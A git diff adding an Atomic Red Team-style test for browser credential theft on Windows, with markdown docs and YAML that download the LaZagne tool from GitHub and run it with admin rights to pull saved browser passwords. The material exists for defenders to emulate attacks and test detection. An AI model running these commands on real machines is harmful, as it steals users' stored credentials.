@@ -101,4 +103,47 @@ grep -q "#{search_string}" "Cookies.binarycookies"
+
+
+
+## Atomic Test #3 - LaZagne - Credentials from Browser
+The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
+LaZagne is an open source application used to retrieve passwords stored on a local computer.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder\T1555.003\bin\LaZagne.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+#{lazagne_path} browsers
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+```
+
+
+
+
diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml
index ec85b06c..784ba955 100644
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -51,3 +51,34 @@ atomic_tests:
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
name: sh
+
+- name: LaZagne - Credentials from Browser
+ auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+ description: |
+ The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
+ LaZagne is an open source application used to retrieve passwords stored on a local computer.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ lazagne_path:
+ description: Path to LaZagne
+ type: Path
+ default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+ prereq_command: |
+ if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ #{lazagne_path} browsers
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index b37349ef..fdff4730 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -623,3 +623,5 @@ c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
f38e9eea-e1d7-4ba6-b716-584791963827
3723ab77-c546-403c-8fb4-bb577033b235
60e860b6-8ae6-49db-ad07-5e73edd88f5d
+9215ea92-1ded-41b7-9cd6-79f9a78397aa
+9a2915b3-3954-4cce-8c76-00fbf4dbd014